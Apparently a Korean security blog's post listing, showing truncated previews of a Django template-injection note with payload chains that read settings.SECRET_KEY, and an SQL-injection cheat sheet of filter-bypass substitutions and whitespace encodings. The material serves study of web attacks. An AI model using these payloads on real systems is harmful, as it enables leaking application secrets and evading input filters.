0x.Web
-
0x01.Django SSTI0x.Web 2018. 11. 21. 12:22
0x01.Django SSTI 템플릿 렌더링을 잘못 사용하였을 경우에 발생{ 2*2 } 와 같은 값을 넣어 해당 결과가 어떻게 출력되는지를 확인함으로써 가능성을 판단 settings.py 의 변수에 접근하는 2가지 방법 {user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY} {user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY} 해당 방식은 장고 프레임워크의 특성상 models.py를 거치기 때문에 결국 연결고리가 존재하기 마련. 최근에는 패치된 취약점..
-
0x00.Injection Sheet0x.Web 2018. 1. 10. 17:54
0x00.Injection Sheet 1. substr 우회 right, left, mid 사용 substr('apple',1,1) = 'a' -> right(left('apple',1),1) = 'a' substr('apple',1,1) = 'a' -> mid('apple',1,1) = 'a' 2. ascii 우회 ord, hex 사용 ascii(substr(pw,1,1)) = ord(substr(pw,1,1)) 3. =, like, or, and 우회 = : like, between, in, instr 이용 or : || and : && 4. 빈칸(공백) 우회 ' ' : ( ), /**/, %09, %0a, %0c, %0b, + - HT(Horizontal Tab) = 수평탭, LF(Line Feed..